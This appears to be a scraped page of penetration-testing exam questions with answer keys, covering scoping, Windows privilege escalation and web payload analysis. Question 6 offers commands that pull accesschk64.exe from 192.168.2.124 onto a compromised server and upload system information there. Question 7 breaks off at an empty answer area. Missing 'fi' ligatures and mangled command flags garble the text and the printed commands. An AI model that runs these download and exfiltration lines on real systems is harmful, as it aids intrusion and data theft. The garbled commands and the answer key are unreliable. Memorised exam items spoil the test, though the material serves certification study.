QUESTION: 5

A new security rm is onboarding its rst client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday.
Which of the following should the security company have acquired BEFORE the start of the assessment?

A signed statement of work
The correct user accounts and associated passwords
The expected time frame of the assessment
The proper emergency contacts for the client

Answer(s): C

Reveal Solution Next Question

QUESTION: 6

A penetration tester has obtained a low-privilege shell on a Windows server with a default con guration and now wants to explore the ability to exploit miscon gured service permissions.
Which of the following commands would help the tester START this process?

certutil "urlcache "split "f http://192.168.2.124/windows-binaries/accesschk64.exe
powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
schtasks /query /fo LIST /v | nd /I Next Run Time:
wget http://192.168.2.124/windows-binaries/accesschk64.exe "O accesschk64.exe

Answer(s): B

Reference:

https://infosecwriteups.com/privilege-escalation-in-windows-380bee3a2842

Reveal Solution Next Question

QUESTION: 7

HOTSPOT (Drag and Drop is not supported)
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were agged as malicious.

INSTRUCTIONS:
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area: